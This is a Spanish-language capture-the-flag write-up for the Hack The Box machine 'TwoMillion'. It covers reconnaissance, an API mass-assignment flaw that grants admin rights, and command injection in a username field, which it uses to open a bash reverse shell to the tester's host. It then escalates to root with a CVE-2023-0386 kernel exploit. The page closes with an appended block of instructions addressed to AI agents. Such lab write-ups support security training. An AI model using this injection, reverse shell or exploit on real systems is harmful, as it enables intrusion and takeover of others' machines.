# TwoMillion ### 🔍 RECONOCIMIENTO En primer lugar, tras conectarnos a la máquina, utilizamos el comando: ```bash ping -c 1 10.10.11.221 ``` para verificar la conectividad de red.

A continuación, realizamos el comando: ```bash nmap -sC -sV 10.10.11.221 ``` para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más. ### 🔎 EXPLORACIÓN Se utiliza el comando: ```bash sudo nmap -sCV -p22,80 -v 10.10.11.221 ``` para que nos proporcione más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Se asimila a la página oficial de Hack The Box pero no vemos nada interesante por lo que revisamos los directorios. ```bash gobuster dir -u http://2million.htb/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --exclude-length 162 ```

Nos llama la atención el directorio `/invite` se asimila a como se tenía que registrar la gente al principio en la plataforma ya que se necesitaba un código de invitación. Tras inspeccionar la página encontramos la función llamada **makeInviteCode**.

La llamamos.

Como vemos esta encriptada en **ROT13** por lo que desencriptamos.

Realizamos lo que nos comunica la pista. ```bash curl -s -X POST "http://2million.htb/api/v1/invite/generate" ```

Está el código en **base64** por lo que decodificamos. ```bash echo "SDg2RjUtUUdRMDUtWEdEMTItU1o3QTg=" | base64 -d ```

Ponemos el código de invitación.

Nos logueamos con las credenciales registradas.

Vamos al apartado de **Access**. Miramos los endpoints de la API. ```bash curl -s -X GET "http://2million.htb/api/v1" -v ```

Nos sale **Unauthorized** por lo que tenemos que coger la **cookie session**.

```bash curl -s -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq ```

No somos administradores. Tampoco podemos generar una VPN. Vemos que podemos actualizar datos del usuario así que probamos. ```bash curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json"| jq ```

Nos avisa del email por lo que añadimos. ```bash curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"email":"bea@gmail.com"}'| jq ```

Nos dice que falta un parámetro por si es administrador. ```bash curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"email":"bea@gmail.com", "is_admin":1}'| jq ```

Somos administradores lo que significa que la API está mal configurada. Por si acaso revisamos. ```bash curl -s -X GET "http://2million.htb/api/v1/admin/auth" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq ```

Intentamos generar una VPN ya que somos admin. ```bash curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq ```

Matizamos lo que se nos avisa. ```bash curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json"| jq ```

Ahora nos pide el parámetro username. ``` curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username":"beafn28"}'| jq ```

La respuesta ya no está en JSON por lo que lo quitamos.

### 🚀 **EXPLOTACIÓN** Genera una VPN por el usuario que le diga. Por lo que hacemos lo siguiente. ```bash curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username":"prueba; whoami;"}' ```

Somos www-data por lo que tenemos RCE. ``` curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username": "prueba; bash -c \"bash -i >& /dev/tcp/10.10.14.58/443 0>&1\";"}' ``` Nos conectamos. ```bash nc -lnvp 443 ```

Tenemos un fichero .env interesante mostramos su contenido.

Migramos de usuario. ```bash ssh admin@2million.htb ```

### 🔐 **PRIVILEGIOS** Al estar dentro y ejecutar: ```bash whoami ``` aún no somos **root**, por lo que hacemos: ```bash sudo -l ``` para ver si hay algo para explotar pero nos pide contraseña. Tampoco tenemos permisos SUID. Nos dice que tenemos un mail.

Al ver la información del sistema en el que nos encontramos encontramos este exploit. {% @github-files/github-code-block url="" %} Nos lo descargamos en nuestra máquina víctima tras comprimirlo en nuestra máquina anfitrión. ```bash wget http://10.10.14.58/comprimido.zip ```

Abrimos otra terminal y nos logueamos a través de **ssh** y también nos situamos en el directorio `/tmp/CVE-2023-0386`. ``` PRIMERA TERMINAL make all ./fuse ./ovlcap/lower ./gc SEGUNDA TERMINAL ./exp ``` Tras realizar esto nos convertimos en **root**.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/twomillion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.